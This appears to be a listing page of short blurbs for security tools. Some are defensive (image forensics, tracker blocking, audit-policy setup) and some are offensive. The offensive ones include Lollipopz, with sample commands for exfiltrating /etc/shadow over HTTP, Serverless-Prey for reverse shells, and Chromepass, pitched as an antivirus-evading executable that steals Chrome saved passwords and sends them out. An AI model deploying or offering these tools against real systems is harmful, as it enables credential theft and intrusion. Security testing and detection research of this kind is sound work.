Lollipopz : Data Exfiltration Utility For Testing Detection Capabilities
Lollipopz is a data exfiltration utility for testing detection capabilities. Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To? /etc/shadow -> HTTP GET requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80...
Sherloq : An Open-Source Digital Image Forensic Toolset
Sherloq is a personal research project about implementing a fully integrated environment for digital image forensics. It is not meant as an automatic tool that decide if an image is forged or not (that tool probably will never exist...), but as a companion in putting at work various algorithms to discover potential image inconsistencies. While many commercial solutions have unaffordable...
Privacy Badger : A Browser Extension Automatically Learns To Block Invisible Trackers
Privacy Badger is a browser extension that automatically learns to block invisible trackers. Instead of keeping lists of what to block, Privacy Badger learns by watching which domains appear to be tracking you as you browse the Web. It sends the Do Not Track signal with your browsing. If trackers ignore your wishes, your Badger will learn to block them....
Audix : A PowerShell Tool To Quickly Configure Windows Event
Audix is a PowerShell tool to quickly configure the Windows Event Audit Policies for security monitoring. Note: This tool will only change the local security policy. If applied to a host with a GPO setting, it is best to use the same settings in a Group Policy default profile so all systems get the same config. If the GPO profile...
Serverless-Prey : Serverless Functions For Establishing Reverse Shells
Serverless-Prey is a collection of serverless functions (FaaS), that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container: Panther: AWS Lambda written in Node.jsCougar: Azure Function written in C#Cheetah: Google Cloud Function written in Go This repository also contains research performed using these functions, including documentation on where secrets...
Lunar : A Lightweight Native DLL Mapping Library
Lunar is a lightweight native DLL mapping library that supports mapping directly from memory. Features Imports and delay imports are resolvedRelocations are performedImage sections are mapped with the correct page protectionException handlers are initialisedA security cookie is generated and initialisedDLL entry point and TLS callbacks are called Getting Started The example below demonstrates a simple implementation of the library var libraryMapper = new LibraryMapper(process,...
Ps-Tools : An Advanced Process Monitoring Toolkit For Offensive Operations
Ps-Tools is an advanced process monitoring toolkit for offensive operations. Having a good technical understanding of the systems we land on during an engagement is a key condition for deciding what is going to be the next step within an operation. Collecting and analyzing data of running processes from compromised systems gives us a wealth of information and helps...
Eavesarp : Analyze ARP Requests To Identify Intercommunicating Hosts
Eavesarp a reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution. Requirements/Installation This is only gon' work on Kali or other Debian-based Linux distributions eavesarp requires Python3.7 and Scapy. After installing Python, run the following to install Scapy: python3.7 -m...
Richkit : Domain Enrichment Toolkit
Richkit is a python3 package that provides tools taking a domain name as input, and returns additional information on that domain. It can be an analysis of the domain itself, looked up from data-bases, retrieved from other services, or some combination thereof. The purpose of richkit is to provide a reusable library of domain name-related analysis, lookups, and retrieval functions,...
Chromepass : Hacking Chrome Saved Passwords
Chromepass is a python-based console application that generates a windows executable with the following features: Decrypt Chrome saved paswordsSend a file with the login/password combinations remotely (email or reverse-http)Custom iconCompletely undetectable by AntiVirus Engines AV Detection Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites VirusTotal Scan...
